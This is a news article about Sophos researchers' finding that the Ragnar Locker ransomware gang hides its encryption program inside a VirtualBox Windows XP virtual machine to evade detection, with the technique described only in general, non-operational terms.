Researchers discover attack group that deploys highly targeted ransomware running inside virtualised Windows XP instance to evade detection
Researchers have uncovered a ransomware gang going to the extreme of deploying their malware inside a virtual machine – a technique used to avoid detection by corporate security systems.
The Ragnar Locker ransomware is only 49 kB in size, but it runs inside a 280 MB Windows XP virtual machine, which is itself run by a copy of Oracle’s VirtualBox.
The gang behind Ragnar Locker go to such lengths because they target the high-value data of specific organisations and demand ransoms that run into the millions of dollars, according to UK security firm Sophos.
“Like a lot criminals who conduct similar ‘targeted’ or ‘big game’ ransomware attacks, the Ragnar Locker gang try to avoid detection as they operate inside a victim’s network,” Sophos said in a statement.
Virtual machines are often used to execute malware in a sandboxed environment, but in this case the attackers reverse the situation, protecting their ransomware from malware scanners.
“The Ragnar Locker actors used a GPO task to execute Microsoft Installer (msiexec.exe), passing parameters to download and silently install a 122 MB crafted, unsigned MSI package from a remote web server,” said Sophos director of engineering for threat mitigation Mark Loman in an advisory.
The MSI package included Sun xVM VirtualBox 3.0.4, released in August 2009, and a stripped-down WIndows XP SP3 image called MicroXP 0.82, which in turn contained the Ragnar Locker executable.
As the ransomware encrypts corporate files across the network, the process appears to be carried out by VirtualBox, a legitimate program.
“Since the vrun.exe ransomware application runs inside the virtual guest machine, its process and behaviours can run unhindered, because they’re out of reach for security software on the physical host machine,” wrote Loman.
The attackers give the virtual environment access to corporate assets by using VirtualBox add-ons that allow files on the host to be shared with the guest.
They then make every local disk, removable storage unit and mapped network drive on the host’s network accessible to the guest virtual machine.
Loman said this was the first time Sophos had seen a virtual machine used in a ransomware attack.
In the past, the Ragnar Locker attackers have targeted managed service providers via internet-exposed RDP endpoints and used their remote access to clients to infect more organisations.
Law enforcement authorities say they have seen a dramatic rise in ransomware attacks since the beginning of the coronavirus pandemic.